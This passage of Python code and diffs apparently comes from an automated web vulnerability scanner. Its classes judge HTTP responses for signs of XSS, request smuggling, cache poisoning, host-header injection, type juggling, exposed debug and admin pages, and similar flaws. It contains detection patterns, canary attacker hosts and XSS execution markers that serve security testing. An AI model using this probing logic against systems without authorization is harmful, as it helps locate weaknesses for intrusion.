return True, 0.6, f"{payload} method accepted"
return False, 0.0, None
class DirectoryListingTester(BaseTester):
    """Tester for Directory Listing exposure."""

    def __init__(self):
        super().__init__()
        self.name = "directory_listing"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check the body for auto-index ("Index of") markers."""
        if response_status == 200:
            # Generic auto-index fingerprints (Apache, Python http.server, ...).
            index_markers = (
                r"<title>Index of\s*/",
                r"Index of\s*/",
                r"<h1>Index of",
                r"Directory listing for\s*/",
                r"<title>Directory listing",
                r'<a\s+href="\.\./">\.\./</a>',
                r"Parent Directory</a>",
                r'\[DIR\]',
                r'\[TXT\]',
                r"<pre>.*<a href=",
            )
            if any(re.search(marker, response_body, re.IGNORECASE) for marker in index_markers):
                return True, 0.9, "Directory listing: Server directory contents exposed"
        # Apache server footer plus an index title is near-certain.
        apache_footer = re.search(r'<address>Apache/[\d.]+ .* Server at', response_body, re.IGNORECASE)
        if apache_footer and "Index of" in response_body:
            return True, 0.95, "Directory listing: Apache directory listing enabled"
        return False, 0.0, None
class DebugModeTester(BaseTester):
    """Tester for Debug Mode/Page exposure."""

    def __init__(self):
        super().__init__()
        self.name = "debug_mode"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for debug pages and stack traces with source paths."""
        # Each group: (patterns, confidence, finding, regex flags),
        # evaluated in order of specificity.
        framework_checks = (
            (
                (
                    r"Werkzeug\s+Debugger",
                    r"werkzeug\.debug",
                    r"<div class=\"debugger\">",
                    r"The debugger caught an exception",
                    r"__debugger__",
                ),
                0.95,
                "Debug mode: Werkzeug interactive debugger exposed (RCE risk)",
                re.IGNORECASE,
            ),
            (
                (
                    r"Whoops!.*Laravel",
                    r"Ignition\s",
                    r"vendor/laravel",
                    r"Laravel.*Exception",
                    r"app/Http/Controllers",
                ),
                0.9,
                "Debug mode: Laravel debug page exposed",
                re.IGNORECASE,
            ),
            (
                (
                    r"You\'re seeing this error because you have <code>DEBUG = True</code>",
                    r"Django Version:",
                    r"Traceback.*django",
                    r"INSTALLED_APPS",
                    r"settings\.py",
                ),
                0.9,
                "Debug mode: Django debug page exposed",
                re.IGNORECASE,
            ),
            (
                (
                    r"(?:File|at)\s+[\"']?(?:/[a-z]+/|C:\\)[^\s\"']+\.(?:py|php|rb|js|java|go)\b",
                    r"Traceback \(most recent call last\)",
                    r"Stack trace:.*(?:\.php|\.py|\.rb|\.java)",
                    r"(?:Error|Exception)\s+in\s+(?:/[a-z]+/|C:\\)[^\s]+:\d+",
                ),
                0.8,
                "Debug mode: Stack trace with source file paths exposed",
                re.IGNORECASE | re.DOTALL,
            ),
        )
        for patterns, confidence, finding, flags in framework_checks:
            for pattern in patterns:
                if re.search(pattern, response_body, flags):
                    return True, confidence, finding
        # ASP.NET detailed errors (matched case-sensitively, as emitted).
        if re.search(r"Server Error in '/' Application", response_body):
            return True, 0.85, "Debug mode: ASP.NET detailed error page exposed"
        return False, 0.0, None
class ExposedAdminPanelTester(BaseTester):
    """Tester for Publicly Accessible Admin Panel."""

    def __init__(self):
        super().__init__()
        self.name = "exposed_admin_panel"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Flag admin/login interfaces that answer an unauthenticated request."""
        if response_status != 200:
            return False, 0.0, None
        # (fingerprint regex, human-readable panel name)
        known_panels = (
            (r"(?:admin|administrator)\s+(?:login|panel|dashboard|console)", "admin login page"),
            (r"<title>[^<]*(?:admin|dashboard|control\s*panel|cms)[^<]*</title>", "admin title"),
            (r"wp-login\.php", "WordPress login"),
            (r"wp-admin", "WordPress admin"),
            (r"/admin/login", "admin login endpoint"),
            (r"phpmyadmin", "phpMyAdmin"),
            (r"adminer\.php", "Adminer"),
            (r"cPanel", "cPanel"),
            (r"Webmin", "Webmin"),
            (r"Plesk", "Plesk"),
            (r"joomla.*administrator", "Joomla admin"),
            (r"drupal.*user/login", "Drupal admin login"),
        )
        for fingerprint, panel_name in known_panels:
            if re.search(fingerprint, response_body, re.IGNORECASE):
                return True, 0.75, f"Exposed admin panel: {panel_name} accessible publicly"
        return False, 0.0, None
class ExposedApiDocsTester(BaseTester):
    """Tester for Publicly Accessible API Documentation.

    Detects Swagger/OpenAPI UIs and raw JSON specifications served
    without authentication.
    """

    def __init__(self):
        super().__init__()
        self.name = "exposed_api_docs"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for Swagger/OpenAPI documentation pages.

        Returns (found, confidence, detail).
        """
        if response_status == 200:
            api_docs_patterns = [
                (r"swagger-ui", "Swagger UI"),
                (r'"swagger"\s*:\s*"[0-9.]+"', "Swagger spec"),
                (r'"openapi"\s*:\s*"[0-9.]+"', "OpenAPI spec"),
                (r"swagger-ui-bundle\.js", "Swagger UI bundle"),
                (r"<title>Swagger UI</title>", "Swagger UI page"),
                (r"redoc", "ReDoc API docs"),
                (r"api-docs", "API documentation"),
                (r"graphiql", "GraphiQL interface"),
                (r"GraphQL Playground", "GraphQL Playground"),
                (r'"paths"\s*:\s*\{', "OpenAPI paths object"),
                (r'"info"\s*:\s*\{.*"title"\s*:', "OpenAPI info object"),
            ]
            for pattern, doc_type in api_docs_patterns:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.8, f"Exposed API docs: {doc_type} publicly accessible"
            # Raw JSON spec detection. Header names are looked up
            # case-insensitively (HTTP headers are case-insensitive and
            # HTTP/2 lowercases them) - consistent with the other testers;
            # the previous exact-case "Content-Type" lookup missed
            # lowercase header names.
            headers_lower = {k.lower(): v for k, v in response_headers.items()}
            content_type = headers_lower.get("content-type", "")
            if "json" in content_type.lower():
                if re.search(r'"paths"\s*:\s*\{.*"(?:get|post|put|delete)"', response_body, re.DOTALL):
                    return True, 0.85, "Exposed API docs: OpenAPI/Swagger JSON specification exposed"
        return False, 0.0, None
class InsecureCookieFlagsTester(BaseTester):
    """Tester for Missing Secure/HttpOnly/SameSite Cookie Flags."""

    def __init__(self):
        super().__init__()
        self.name = "insecure_cookie_flags"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Audit every Set-Cookie header for missing security attributes."""
        # Gather all Set-Cookie values (a header may hold a list).
        cookies = []
        for header_name, header_value in response_headers.items():
            if header_name.lower() != "set-cookie":
                continue
            if isinstance(header_value, list):
                cookies.extend(header_value)
            else:
                cookies.append(header_value)
        if not cookies:
            return False, 0.0, None
        # Name fragments that mark a cookie as session/auth related.
        session_hints = ("session", "sess", "sid", "token", "auth", "jwt", "csrf")
        issues = []
        for raw_cookie in cookies:
            lowered = raw_cookie.lower()
            cookie_name = raw_cookie.split("=")[0].strip()
            missing = [flag for flag in ("Secure", "HttpOnly", "SameSite")
                       if flag.lower() not in lowered]
            if not missing:
                continue
            # Session-bearing cookies make a missing flag more severe.
            kind = "session cookie" if any(h in cookie_name.lower() for h in session_hints) else "cookie"
            issues.append(f"{cookie_name} ({kind}): missing {', '.join(missing)}")
        if not issues:
            return False, 0.0, None
        confidence = 0.8 if any("session cookie" in entry for entry in issues) else 0.6
        return True, confidence, f"Insecure cookie flags: {'; '.join(issues[:3])}"
class HttpSmugglingTester(BaseTester):
    """Tester for HTTP Request Smuggling (CL/TE discrepancy)."""

    def __init__(self):
        super().__init__()
        self.name = "http_smuggling"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Look for CL/TE desync indicators in the response and context."""
        # Parser errors that hint at CL/TE confusion.
        desync_errors = (
            (r"400 Bad Request.*(?:Content-Length|Transfer-Encoding)", "CL/TE parsing error"),
            (r"(?:invalid|malformed)\s+(?:chunk|transfer.encoding)", "chunked encoding error"),
        )
        for pattern, label in desync_errors:
            if re.search(pattern, response_body, re.IGNORECASE | re.DOTALL):
                return True, 0.7, f"HTTP smuggling indicator: {label}"
        # A response carrying both framing headers is itself suspicious.
        has_te = bool(response_headers.get("Transfer-Encoding", ""))
        has_cl = bool(response_headers.get("Content-Length", ""))
        if has_te and has_cl:
            return True, 0.75, "HTTP smuggling: Both Transfer-Encoding and Content-Length in response"
        # Timing-based detection via context supplied by the harness.
        payload_lower = payload.lower()
        if context.get("response_time_ms", 0) > 10000:
            if "transfer-encoding" in payload_lower or "content-length" in payload_lower:
                return True, 0.6, "HTTP smuggling: Abnormal response delay with CL/TE payload"
        # Desync often shows up as a dropped/reset connection.
        if response_status == 0 or context.get("connection_reset"):
            return True, 0.65, "HTTP smuggling: Connection reset/timeout with smuggling payload"
        return False, 0.0, None
class CachePoisoningTester(BaseTester):
    """Tester for Web Cache Poisoning.

    Detects reflected unkeyed input in responses that were (or could
    be) cached, using common CDN/proxy cache headers as evidence.
    """

    def __init__(self):
        super().__init__()
        self.name = "cache_poisoning"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for cached response with injected unkeyed input.

        Returns (found, confidence, detail).
        """
        if response_status != 200:
            return False, 0.0, None
        # Determine whether this response was served from a cache.
        cache_indicators = {
            "X-Cache": response_headers.get("X-Cache", ""),
            "CF-Cache-Status": response_headers.get("CF-Cache-Status", ""),
            "Age": response_headers.get("Age", ""),
            "X-Varnish": response_headers.get("X-Varnish", ""),
        }
        is_cached = False
        for header, value in cache_indicators.items():
            if not value:
                continue
            if any(hit in value.upper() for hit in ["HIT", "STALE"]):
                is_cached = True
                break
            if header == "Age":
                # Age may be non-numeric on broken proxies; previously a
                # bare int() here could raise ValueError and abort the test.
                try:
                    if int(value) > 0:
                        is_cached = True
                        break
                except ValueError:
                    pass
        # Our unkeyed input reflected in a (potentially) cached response.
        if is_cached or response_headers.get("Cache-Control", ""):
            if payload in response_body:
                if is_cached:
                    return True, 0.9, "Cache poisoning: Injected unkeyed input reflected in cached response"
                return True, 0.7, "Cache poisoning: Unkeyed input reflected - verify caching"
        # Reflection in a response that caches are allowed to store.
        cache_control = response_headers.get("Cache-Control", "")
        if "no-store" not in cache_control and "private" not in cache_control:
            if payload in response_body:
                return True, 0.6, "Cache poisoning potential: Input reflected in cacheable response"
        return False, 0.0, None
+92 -21
View File
@@ -35,20 +35,15 @@ class XSSReflectedTester(BaseTester):
# Check if payload is reflected
if payload in response_body:
# Check if it's in a dangerous context
dangerous_patterns = [
rf'<script[^>]*>{re.escape(payload)}',
rf'on\w+\s*=\s*["\']?{re.escape(payload)}',
rf'javascript:\s*{re.escape(payload)}',
rf'<[^>]+{re.escape(payload)}[^>]*>',
]
for pattern in dangerous_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, f"XSS payload reflected in dangerous context: {pattern}"
# Payload reflected but possibly encoded
return True, 0.7, "XSS payload reflected in response"
# Use context-aware analysis to determine execution position
from backend.core.xss_context_analyzer import analyze_xss_execution_context
ctx = analyze_xss_execution_context(response_body, payload)
if ctx["executable"]:
return True, 0.95, f"XSS payload in auto-executing context: {ctx['detail']}"
elif ctx["interactive"]:
return True, 0.85, f"XSS payload in interactive context: {ctx['detail']}"
# Reflected but not in executable position
return True, 0.5, f"XSS payload reflected but {ctx['context']}: {ctx['detail']}"
# Check for partial reflection (script tags, etc.)
for marker in self.markers:
@@ -59,11 +54,21 @@ class XSSReflectedTester(BaseTester):
class XSSStoredTester(BaseTester):
"""Tester for Stored XSS vulnerabilities"""
"""Tester for Stored XSS vulnerabilities.
Supports two-phase verification:
Phase 1: analyze_response() - Check if submission succeeded (data stored)
Phase 2: analyze_display_response() - Check if payload executes on display page
"""
def __init__(self):
super().__init__()
self.name = "xss_stored"
self.storage_indicators = [
"success", "created", "saved", "posted", "submitted",
"thank", "comment", "added", "published", "updated",
"your comment", "your post", "your message",
]
def analyze_response(
self,
@@ -73,12 +78,78 @@ class XSSStoredTester(BaseTester):
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for stored XSS - requires subsequent request verification"""
# For stored XSS, we need to check if data was stored
# This is a simplified check - full implementation would verify on retrieval
if response_status in [200, 201, 302]:
if "success" in response_body.lower() or "created" in response_body.lower():
return True, 0.5, "Data possibly stored - verify retrieval for stored XSS"
"""Phase 1: Check if payload was likely stored.
Returns confidence 0.3-0.5 for storage-only confirmation.
Full confirmation requires Phase 2 (analyze_display_response).
"""
body_lower = response_body.lower()
# Redirect after POST is a common form submission pattern
if response_status in [301, 302, 303]:
return True, 0.4, "Redirect after submission - payload likely stored"
if response_status in [200, 201]:
# Check for storage success indicators
for indicator in self.storage_indicators:
if indicator in body_lower:
return True, 0.4, f"Storage indicator found: '{indicator}'"
# Check if payload is reflected in the same response (immediate display)
if payload in response_body:
dangerous = [
"<script", "onerror=", "onload=", "onclick=", "onfocus=",
"onmouseover=", "<svg", "<img", "<iframe", "javascript:"
]
payload_lower = payload.lower()
for ctx in dangerous:
if ctx in payload_lower:
return True, 0.8, f"Stored XSS: payload reflected in dangerous context ({ctx})"
return True, 0.6, "Payload reflected in submission response"
# POST returning 200 often means submission accepted
if response_status == 200 and context.get("method") == "POST":
return True, 0.3, "POST returned 200 - submission possibly accepted"
return False, 0.0, None
def analyze_display_response(
    self,
    payload: str,
    response_status: int,
    response_headers: Dict,
    response_body: str,
    context: Dict
) -> Tuple[bool, float, Optional[str]]:
    """Phase 2: verify the stored payload renders on the display page.

    Called after navigating to the page where the stored content is
    shown; confirms (or downgrades) the Phase 1 storage finding.
    Returns (found, confidence, detail).
    """
    if response_status >= 400:
        return False, 0.0, None
    if payload in response_body:
        # Delegate position analysis to the shared context analyzer.
        from backend.core.xss_context_analyzer import analyze_xss_execution_context
        verdict = analyze_xss_execution_context(response_body, payload)
        if verdict["executable"]:
            return True, 0.95, f"Stored XSS confirmed: {verdict['detail']}"
        if verdict["interactive"]:
            return True, 0.90, f"Stored XSS (interaction required): {verdict['detail']}"
        # Present on the page, but not in an executable position.
        return True, 0.5, f"Stored payload on display page but {verdict['context']}: {verdict['detail']}"
    # The payload may have been transformed on storage; look for core
    # execution markers that survived into the rendered page.
    payload_lower = payload.lower()
    rendered_lower = response_body.lower()
    for marker in ("alert(1)", "alert(document.domain)", "onerror=alert",
                   "onload=alert", "onfocus=alert", "ontoggle=alert"):
        if marker in payload_lower and marker in rendered_lower:
            return True, 0.85, f"Stored XSS: execution marker '{marker}' found on display page"
    return False, 0.0, None
+457
View File
@@ -0,0 +1,457 @@
"""
NeuroSploit v3 - Logic and Protocol Vulnerability Testers
Testers for race conditions, business logic, rate limiting, parameter pollution,
type juggling, timing attacks, host header injection, HTTP smuggling, cache poisoning.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class RaceConditionTester(BaseTester):
    """Tester for Race Condition vulnerabilities."""

    def __init__(self):
        super().__init__()
        self.name = "race_condition"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for duplicate operation success indicators.

        Relies on harness-supplied context keys:
        - concurrent_successes: parallel requests that all succeeded
        - request_count: how many times the same operation was replayed
        - expected_value: expected balance/quantity after the operation

        Returns (found, confidence, detail).

        Note: a dead ``duplicate_indicators`` list (never referenced)
        was removed from this method.
        """
        body_lower = response_body.lower()
        # Multiple success responses from concurrent requests
        if context.get("concurrent_successes", 0) > 1:
            return True, 0.85, f"Race condition: {context['concurrent_successes']} concurrent requests succeeded"
        # If we got a success despite an expected duplicate check
        if response_status in [200, 201]:
            success_words = ["success", "created", "processed", "applied", "completed", "confirmed"]
            if any(w in body_lower for w in success_words):
                if context.get("request_count", 0) > 1:
                    return True, 0.7, "Race condition: operation succeeded multiple times"
        # Check for resource count discrepancy
        if "balance" in body_lower or "quantity" in body_lower or "count" in body_lower:
            numbers = re.findall(r'"(?:balance|quantity|count|amount)"\s*:\s*(-?\d+\.?\d*)', response_body)
            if numbers and context.get("expected_value") is not None:
                try:
                    actual = float(numbers[0])
                    expected = float(context["expected_value"])
                    if actual != expected:
                        return True, 0.75, f"Race condition: value mismatch (expected {expected}, got {actual})"
                except (ValueError, IndexError):
                    pass
        return False, 0.0, None
class BusinessLogicTester(BaseTester):
    """Tester for Business Logic vulnerabilities."""

    def __init__(self):
        super().__init__()
        self.name = "business_logic"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for business logic bypass indicators."""
        body_lower = response_body.lower()
        payload_lower = payload.lower()
        # 1) Negative values accepted for amounts/prices.
        if re.search(r"-\d+", payload):
            accepted_words = ("success", "accepted", "processed", "approved")
            if response_status == 200 and any(w in body_lower for w in accepted_words):
                return True, 0.8, "Business logic: negative value accepted"
            if re.search(r'"(?:total|price|amount)"\s*:\s*-\d+', response_body):
                return True, 0.9, "Business logic: negative price/amount in response"
        # 2) Zero-value transactions accepted.
        if payload.strip() in ["0", "0.00", "0.0"]:
            if response_status == 200 and "success" in body_lower:
                return True, 0.75, "Business logic: zero value accepted for transaction"
        # 3) Workflow step skipping (signalled by the harness).
        if context.get("skipped_step") and response_status == 200:
            return True, 0.7, f"Business logic: step '{context['skipped_step']}' was skippable"
        # 4) Discount/coupon abuse (>= 100% discount).
        if "coupon" in payload_lower or "discount" in payload_lower:
            if re.search(r'"discount"\s*:\s*(?:100|[1-9]\d{2,})', response_body):
                return True, 0.8, "Business logic: excessive discount applied"
        # 5) Privilege escalation via request parameter.
        if any(w in payload_lower for w in ["admin", "role=admin", "is_admin=true", "privilege"]):
            if response_status == 200 and "admin" in body_lower:
                return True, 0.6, "Business logic: privilege escalation parameter accepted"
        return False, 0.0, None
class RateLimitBypassTester(BaseTester):
    """Tester for Rate Limit Bypass vulnerabilities."""

    def __init__(self):
        super().__init__()
        self.name = "rate_limit_bypass"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for continued success after many requests (bypass)."""
        lowered = {name.lower(): val for name, val in response_headers.items()}
        attempts = context.get("request_count", 0)
        # Still receiving 200s after a large burst of requests.
        if attempts > 50 and response_status == 200:
            remaining = lowered.get(
                "x-ratelimit-remaining",
                lowered.get("x-rate-limit-remaining", lowered.get("ratelimit-remaining")),
            )
            if remaining is None:
                # The server advertises no rate-limit headers at all.
                return True, 0.7, f"No rate limiting detected after {attempts} requests"
            try:
                if int(remaining) > 0:
                    return True, 0.6, f"Rate limit not enforced after {attempts} requests (remaining: {remaining})"
            except ValueError:
                pass
        # Bypass via client-IP spoofing headers.
        spoof_headers = ("x-forwarded-for", "x-real-ip", "x-originating-ip", "x-client-ip")
        if any(h in payload.lower() for h in spoof_headers):
            if response_status == 200 and context.get("was_rate_limited"):
                return True, 0.85, "Rate limit bypassed via IP spoofing header"
        # Harness expected a 429 but the request went through.
        if context.get("expected_429") and response_status == 200:
            return True, 0.8, "Expected 429 (rate limited) but received 200"
        return False, 0.0, None
class ParameterPollutionTester(BaseTester):
    """Tester for HTTP Parameter Pollution vulnerabilities."""

    def __init__(self):
        super().__init__()
        self.name = "parameter_pollution"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Compare against the single-parameter baseline for divergence."""
        # Divergence from the baseline (single-parameter) response.
        if "baseline_body" in context and "baseline_status" in context:
            size_delta = abs(len(response_body) - len(context["baseline_body"]))
            if size_delta > 200:
                return True, 0.7, f"Parameter pollution: response differs by {size_delta} bytes from baseline"
            if response_status != context["baseline_status"]:
                return True, 0.75, f"Parameter pollution: status changed from {context['baseline_status']} to {response_status}"
        # The duplicated (attacker) value won over the original one.
        if "neurosploit" in payload and "neurosploit" in response_body:
            original_value = context.get("original_value")
            if original_value and original_value not in response_body:
                return True, 0.8, "Parameter pollution: attacker value used instead of original"
        # A payload the WAF blocked stand-alone succeeded when duplicated.
        if context.get("waf_blocked_original") and response_status == 200:
            return True, 0.8, "Parameter pollution: WAF bypass - blocked payload succeeded with duplicate params"
        return False, 0.0, None
class TypeJugglingTester(BaseTester):
    """Tester for Type Juggling / Type Coercion vulnerabilities"""

    def __init__(self):
        super().__init__()
        self.name = "type_juggling"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict,
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for auth bypass with type coercion.

        Returns (found, confidence, detail).
        """
        lowered = response_body.lower()
        trimmed = payload.strip()
        # Classic loose-comparison values plus PHP "magic hash" 0e strings.
        coercion_values = {"0", "true", "false", "null", "[]", "{}", "0e123", "0e999"}
        if (trimmed in coercion_values or trimmed.startswith("0e")) and response_status == 200:
            success_markers = (
                "authenticated", "logged in", "welcome", "dashboard",
                "token", "session", "success",
            )
            hit = next((m for m in success_markers if m in lowered), None)
            if hit is not None:
                return True, 0.8, f"Type juggling: auth bypass with '{trimmed}' - '{hit}' in response"
        # A token/JWT issued on a coerced value.
        if ("jwt" in lowered or "bearer" in lowered) and response_status == 200:
            return True, 0.7, f"Type juggling: token accepted with value '{trimmed}'"
        # PHP loose comparison of magic hashes ("0e..." == "0e..." evaluates true).
        if re.match(r"0e\d+", trimmed) and response_status == 200:
            if any(w in lowered for w in ["match", "equal", "valid", "correct"]):
                return True, 0.85, f"Type juggling: magic hash bypass with '{trimmed}'"
        # Array-vs-string comparison quirks.
        if trimmed in ("[]", "Array") and response_status == 200 and "success" in lowered:
            return True, 0.7, "Type juggling: array comparison bypass"
        return False, 0.0, None
class TimingAttackTester(BaseTester):
    """Tester for Timing Attack vulnerabilities"""

    def __init__(self):
        super().__init__()
        self.name = "timing_attack"

    def check_timeout_vulnerability(self, vuln_type: str) -> bool:
        """Timing attacks are detected via response time differences"""
        return True

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check response time differences for timing side channels.

        Returns (found, confidence, detail).
        """
        # Primary detection is via response timing (handled by engine)
        response_time = context.get("response_time_ms", 0)
        baseline_time = context.get("baseline_time_ms", 0)
        if response_time > 0 and baseline_time > 0:
            diff = response_time - baseline_time
            # BUGFIX: test the larger threshold first. Previously the
            # `diff > 100` branch returned before the `diff > 500` check,
            # making the high-confidence (0.9) detection unreachable.
            # Very significant (> 500ms)
            if diff > 500:
                return True, 0.9, f"Timing attack: {diff}ms difference strongly indicates character-by-character comparison"
            # Significant timing difference (> 100ms)
            if diff > 100:
                return True, 0.7, f"Timing attack: {diff}ms difference (baseline: {baseline_time}ms, actual: {response_time}ms)"
        # Check for timing via multiple measurements
        if "timing_samples" in context:
            samples = context["timing_samples"]
            if len(samples) >= 2:
                # Large variance across repeated probes also signals a side channel.
                max_diff = max(samples) - min(samples)
                if max_diff > 200:
                    return True, 0.65, f"Timing attack: {max_diff}ms variance across samples"
        return False, 0.0, None
class HostHeaderInjectionTester(BaseTester):
    """Tester for Host Header Injection vulnerabilities"""

    def __init__(self):
        super().__init__()
        self.name = "host_header_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict,
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for Host value reflected in response links/URLs.

        Returns (found, confidence, detail).
        """
        lowered_body = response_body.lower()
        lowered_payload = payload.lower()
        canary_hosts = ["evil.com", "attacker.com", "neurosploit.test", "canary.host"]
        # An injected canary host showing up in the body is a reflection.
        for host in canary_hosts:
            if host not in lowered_payload or host not in lowered_body:
                continue
            escaped = re.escape(host)
            # URL-ish contexts are the high-confidence case.
            url_patterns = (
                rf'https?://{escaped}',
                rf'href\s*=\s*["\'][^"\']*{escaped}',
                rf'action\s*=\s*["\'][^"\']*{escaped}',
                rf'redirect.*{escaped}',
            )
            if any(re.search(p, response_body, re.IGNORECASE) for p in url_patterns):
                return True, 0.9, f"Host header injection: '{host}' reflected in URL context"
            return True, 0.7, f"Host header injection: '{host}' reflected in response body"
        # X-Forwarded-Host leaking into a redirect target.
        if "x-forwarded-host" in lowered_payload:
            lowered_headers = {k.lower(): v for k, v in response_headers.items()}
            location = lowered_headers.get("location", "")
            if any(h in location.lower() for h in canary_hosts):
                return True, 0.9, "Host header injection: X-Forwarded-Host reflected in redirect"
        # Poisoned password-reset links are the highest-impact variant.
        if context.get("is_password_reset") and response_status == 200:
            for host in canary_hosts:
                if host in lowered_body:
                    return True, 0.95, f"Host header injection in password reset: link points to '{host}'"
        return False, 0.0, None
class HttpSmugglingTester(BaseTester):
    """Tester for HTTP Request Smuggling vulnerabilities"""

    def __init__(self):
        super().__init__()
        self.name = "http_smuggling"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict,
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for HTTP smuggling indicators.

        Returns (found, confidence, detail).
        """
        lowered_headers = {name.lower(): value for name, value in response_headers.items()}
        # A full status line embedded in the body means two responses in one.
        if re.search(r"HTTP/\d\.\d\s+\d{3}", response_body):
            return True, 0.85, "HTTP smuggling: embedded HTTP response in body (response splitting)"
        # CL + TE together is the classic desync precondition.
        if "content-length" in lowered_headers and "transfer-encoding" in lowered_headers:
            return True, 0.7, "HTTP smuggling: both Content-Length and Transfer-Encoding present"
        # Engine-level CL.TE / TE.CL desync confirmation.
        if context.get("desync_detected"):
            return True, 0.9, "HTTP smuggling: request desync confirmed"
        # Marker from the smuggled second request leaking into this response.
        if "smuggle_marker" in context:
            marker = context["smuggle_marker"]
            if marker in response_body:
                return True, 0.85, f"HTTP smuggling: smuggled request marker '{marker}' in response"
        # Frontend/backend disagreement on how the request parsed.
        expected = context.get("expected_status")
        if expected and response_status != expected:
            if response_status in (400, 403) and expected == 200:
                return True, 0.5, f"HTTP smuggling: status mismatch (expected {expected}, got {response_status})"
        # A poisoned queue typically stalls the follow-up request.
        if context.get("second_request_timeout"):
            return True, 0.7, "HTTP smuggling: second request timed out (possible queue poisoning)"
        return False, 0.0, None

    def check_timeout_vulnerability(self, vuln_type: str) -> bool:
        """Smuggling can cause timeouts on subsequent requests"""
        return True
class CachePoisoningTester(BaseTester):
    """Tester for Web Cache Poisoning vulnerabilities"""

    def __init__(self):
        super().__init__()
        self.name = "cache_poisoning"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict,
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for cache poisoning - injected content served from cache.

        Returns (found, confidence, detail).
        """
        lowered_headers = {k.lower(): v for k, v in response_headers.items()}
        lowered_payload = payload.lower()
        lowered_body = response_body.lower()
        # Determine whether this response was served from a cache layer.
        cache_indicator_headers = (
            "x-cache", "cf-cache-status", "x-varnish", "x-drupal-cache",
            "x-proxy-cache", "x-cdn-cache",
        )
        served_from_cache = any(
            "hit" in lowered_headers.get(h, "").lower()
            for h in cache_indicator_headers
        )
        # A non-zero Age header also indicates a cached response.
        age = lowered_headers.get("age")
        if age and age != "0":
            served_from_cache = True
        if served_from_cache:
            # Our injected marker coming back from cache = confirmed poisoning.
            for marker in ("neurosploit", "xss", "evil.com", "attacker"):
                if marker in lowered_payload and marker in lowered_body:
                    return True, 0.9, f"Cache poisoning: injected content '{marker}' served from cache"
        # Unkeyed header reflection: a poison vector even without a cache hit.
        unkeyed = (
            "x-forwarded-host", "x-forwarded-scheme", "x-original-url",
            "x-rewrite-url", "x-forwarded-prefix",
        )
        for header in unkeyed:
            if header not in lowered_payload:
                continue
            for marker in ("evil.com", "neurosploit", "attacker"):
                if marker in lowered_payload and marker in lowered_body:
                    cache_state = "cached" if served_from_cache else "uncached"
                    score = 0.85 if served_from_cache else 0.5
                    return True, score, f"Cache poisoning: unkeyed header '{header}' reflected ({cache_state})"
        # Cache deception: sensitive content cached under an attacker-chosen path.
        if context.get("is_cache_deception_test"):
            if served_from_cache and ("token" in lowered_body or "session" in lowered_body):
                return True, 0.8, "Cache deception: sensitive data cached via path confusion"
        return False, 0.0, None
@@ -97,3 +97,115 @@ class CSRFTester(BaseTester):
return True, 0.7, "No CSRF token found in form - possible CSRF"
return False, 0.0, None
class GraphqlIntrospectionTester(BaseTester):
    """Tester for GraphQL Introspection exposure"""

    # Markers of a full schema dump returned by an introspection query.
    _SCHEMA_PATTERNS = (
        r'"__schema"\s*:\s*\{',
        r'"__type"\s*:\s*\{',
        r'"queryType"\s*:\s*\{',
        r'"mutationType"\s*:\s*\{',
        r'"subscriptionType"\s*:',
        r'"types"\s*:\s*\[.*"name"\s*:\s*"__',
        r'"directives"\s*:\s*\[.*"name"\s*:',
    )
    # Partial type metadata that still leaks schema structure.
    _TYPE_LISTING_PATTERNS = (
        r'"kind"\s*:\s*"(?:OBJECT|SCALAR|ENUM|INPUT_OBJECT|INTERFACE|UNION)"',
        r'"fields"\s*:\s*\[.*"name"\s*:.*"type"\s*:',
        r'"inputFields"\s*:\s*\[',
        r'"enumValues"\s*:\s*\[',
    )

    def __init__(self):
        super().__init__()
        self.name = "graphql_introspection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict,
    ) -> Tuple[bool, float, Optional[str]]:
